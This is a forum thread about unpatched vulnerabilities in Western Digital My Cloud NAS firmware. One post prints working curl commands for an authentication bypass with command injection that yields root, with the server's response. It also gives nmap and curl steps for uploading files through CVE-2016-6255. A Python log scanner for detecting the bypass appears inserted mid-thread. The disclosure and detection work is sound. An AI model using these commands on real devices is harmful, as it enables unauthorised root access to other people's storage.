Latest firmware still vulnerable

I can only see the NAS being hit if a computer on the LAN spreads the worm to the NAS. If the SMB ports are not forwarded to the Internet then the worm on the Internet will not be able to find the Samba service on the NAS on the LAN.

As long as you keep your LAN environment clean then it should not be a problem.

Hello
How do we get Twonky media to understand playlists made in iTunes?

Wrong thread. Not related to the firmware vulnerability issues being discussed in this topic. Suggest you either use the forum search feature (magnifying glass icon upper right) to see if your question has already been discussed, or start a new discussion topic.

For example see the past discussions on iTunes Playlists and the My Cloud:
https://community.wd.com/search?q=twonky%20itunes%20playlist%20category%3A105

Also see the unofficial Twonky FAQ at this link:
https://community.wd.com/t/faq-twonky-dlna-media-server-setup-use/95373

1 Like

Thanks for the answer. I thought that the instruction was that disabling cloud access is not enough. If the WD is on the network it is vulnerable.

Thoughts?
Can we get a Best Practices guide together?

I don’t know; I’m not a white hat security researcher. And, as I said, WD have not identified which of the nearly 100 vulnerabilities recently reported they think they have fixed, and I’ve not seen any reports of white hats doing re-tests.

Best Practice guide? Sorry, I can’t help with that.

1 Like

Is there any more progress with this?
Or more information somewhere else?

I became aware of the issues here:
https://threatpost.com/unpatched-western-digital-bugs-leave-nas-boxes-open-to-attack/124125/

Who knows? WD aren’t telling us anything about what they’ve done to fix the raft of vulnerabilities identified.

There has been a firmware upgrade, but it gives no details of what specific CVE issues have been addressed.

WD really don’t seem to take security seriously; certainly not when communicating with customers about security concerns.

That article is from March 7th. WD released new firmware in April that was supposed to address “critical security vulnerabilities”.

Unless those organizations that reported (or someone on their own) the security vulnerabilities back in March retest the My Cloud units with the updated firmware to see if the holes have been patched we won’t know if they’ve really been patched.

https://community.wd.com/t/new-release-my-cloud-firmware-versions-4-05-00-315-2-30-165-4-19-17/202232

1 Like

Please, how do I downgrade the firmware on the WD My Cloud to 04.05.00-101?
After upgrading to the latest version, my hard drive does not sleep. It only sleeps for a short time and then wakes up again while inactive.

If one uses the forum search feature (magnifying glass icon upper right) they’ll find several past discussions on how to downgrade the single bay My Cloud to an earlier firmware version. Note however that downgrading to earlier firmware may increase the My Cloud vulnerability since it won’t have newer fixes or patches, the subject of this current discussion. Here is one such discussion on how to downgrade:

This issue isn’t really related to the subject of this discussion on the firmware being vulnerable to certain hacks. Again, use the forum search feature and search for “sleep” and you’ll find numerous discussions on how to try and deal with the single bay My Cloud when it doesn’t go into sleep mode. For example:

https://community.wd.com/search?q=sleep%20category%3A105

Thank you for answer. I’ll read.

FWIW the latest firmware update for the MyCloud Mirror 1st Gen currently says:

Resolved critical security vulnerabilities that potentially allowed unauthorized file deletion, unauthorized command execution and authentication bypass.

-> New Release - My Cloud Mirror Firmware Release 2.11.169 (01/12/18)

However there is still at least one vulnerability described in:

https://www.exploitee.rs/index.php/Western_Digital_MyCloud#network_mgr.cgi_.28added_8.2F6.2F2017.29

which exists in / affects the newest 2.11.168 firmware of the MyCloud Mirror 1st Gen. Maybe other models / generations are affected as well; you can easily test this on your own with a Linux based system and two simple curl calls showing the authentication bypass:

curl -i "http://IP/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1"
curl -i "http://IP/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin"

Just replace the admin in “username=admin” with a valid user and you’re getting the following response:

HTTP/1.1 200 OK
Date: Thu, 30 Nov 2017 12:39:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: application/json
Content-Language: en

<br />
<b>Warning</b>:  http_response_code() expects parameter 1 to be long, string given in <b>/usr/local/modules/web/pages/dsdk/DsdkProxy.php</b> on line <b>48</b><br />
uid=0(root) gid=0(root) groups=0(root)
sh: : Permission denied

which means that you’re again able to run arbitrary commands on the system as root.

Edit

At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to CVE-2016-6255 in libupnp, listed here as well:

https://nvd.nist.gov/vuln/detail/CVE-2016-6255

This can be simply checked with the following steps to upload a file to the target device:

  1. Scan for the UPnP TCP port of the device:

nmap -p 49000-49999 IP

  2. Verify that the file doesn’t exist yet:

curl -i http://IP:49154/test123

(Use the previously found port)

  3. Upload a new file:

curl -i --data "uploadtest" http://IP:49154/test123

  4. Verify that the file exists:

curl -i http://IP:49154/test123

Side-note:

I would love to submit this to https://support.wdc.com/ as asked in some other threads, but I have not been able to create an account there for a few days now. It just says “registration failed” after submitting the registration form without giving ANY information why it failed.

If someone here has an account please go ahead and submit it.

Edit

It seems the second vulnerability has even been known for more than a year:
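Added example, not code from the post or from WD: a small Python scanner that runs over constructed Apache combined-format access log lines and flags the two request patterns used above to demonstrate the DsdkProxy.php authentication bypass, so a defender can spot the same sequence against their own device. The log format, sample lines and the `RULES` table are assumptions; the `isAdmin=1` cookie itself is not recorded in the combined format, so the scanner keys on method and path.

```python
import re

# Constructed sample lines in Apache combined log format (not real device logs);
# the first two mimic the network_mgr.cgi probe and the DsdkProxy.php POST.
SAMPLE_LOG = """\
192.168.1.50 - - [30/Nov/2017:12:39:18 +0000] "GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1 HTTP/1.1" 200 512 "-" "curl/7.52.1"
192.168.1.50 - - [30/Nov/2017:12:39:20 +0000] "POST /web/dsdk/DsdkProxy.php HTTP/1.1" 200 231 "-" "curl/7.52.1"
192.168.1.20 - - [30/Nov/2017:12:40:01 +0000] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
192.168.1.20 - - [30/Nov/2017:12:40:05 +0000] "POST /cgi-bin/login_mgr.cgi HTTP/1.1" 200 87 "http://192.168.1.10/" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumed detection rules: (rule name, HTTP method, exact path without query string)
RULES = [
    ("network_mgr_probe", "GET", "/cgi-bin/network_mgr.cgi"),
    ("dsdkproxy_post", "POST", "/web/dsdk/DsdkProxy.php"),
]


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text):
    """Return one finding per log line that matches a rule."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path_only = rec["path"].split("?", 1)[0]   # drop the query string
        for name, method, path in RULES:
            if rec["method"] == method and path_only == path:
                findings.append({"rule": name, "ip": rec["ip"], "ts": rec["ts"],
                                 "path": rec["path"], "ua": rec["ua"]})
    return findings


def sources_hitting_both(findings):
    """Client IPs that triggered every rule, i.e. the full probe-then-POST sequence."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return sorted(ip for ip, rules in by_ip.items() if len(rules) == len(RULES))
```

Point the scanner at the device's real access log to see whether the same sequence has already been tried against it.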

This topic discusses the vulnerability for the MyCloud and not for the My Cloud Mirror. These are different products, so they may have different update contents/software.

That’s because this is the MyCloud forum, and NOT the Mirror forum…

And the firmware really isn’t very different, especially in the gen2/v2 version.

Exactly, that’s why I had pointed out in my initial post that my observations are from a MyCloud Mirror 1st Gen:

and that it might be possible that other models / generations are affected as well by those known / existing vulnerabilities:

And most stuff on the https://www.exploitee.rs wiki page seems to have been tested on a MyCloud EX2 but the MyCloud Mirror 1st Gen was affected by all vulnerabilities as well.

As the MyCloud Mirror changelog contains notes about fixed vulnerabilities, while not all known ones are fixed as shown above, this might apply to the plain MyClouds as well. Thus I assume that the changelogs can’t be fully trusted.

So if you’re on a MyCloud (which you obviously are, based on this forum) you can verify the two posted vulnerabilities against your device. And if the device is still vulnerable, the posts fit here (in the “Latest firmware still vulnerable” thread) as well.

1 Like

hi there,

Regardless of whether the vulnerabilities were closed with the latest updates, I would like to summarize for myself: what are the steps to protect yourself? So I update the firmware, that is first and for sure.
Disabling Cloud Access was also important. But what else can / must one do? On the router? On the MyCloud device? In the dashboard? Disabling UPnP, as I remember?

can we summarize :thinking:
thanks

With new reports like:

http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125

coming in, I would suggest fully disabling remote access to the device and preventing access to the device by untrusted systems/users from within your local network.

1 Like

It’s best to disconnect it from power supply, as a web page loaded in some device on a machine on the local network can exploit the backdoor just as well.

I find it hard to accept that this vulnerability should have been known to WD since June last year, and no fix has been provided. This is bad. The statements made by WD staff members in this thread (much earlier) about them taking security issues seriously sound pretty derisive.

Whew for once the first gen v4.x single bay units are not affected… :laughing:

Always a good suggestion in any event with or without a My Cloud device on the local network. If one is serious about their network security they’d restrict guest access and ensure guest systems are clean before being allowed to access the full local network. Otherwise confine those guests and their systems to a guest network that is blocked from being able to access the main local network where devices like the My Cloud reside. Most consumers however are not that anal (even if it’s good practice) about securing their local network and their devices (like the My Cloud).

Edit to add: It should be noted that the Gulftech.org vulnerability was against the 2.30.165 firmware. No word (at least I didn’t see it in the article) if the current v2.30.172 firmware released on 11/16/17 for the single bay My Cloud units is affected or if the vuln hole was closed.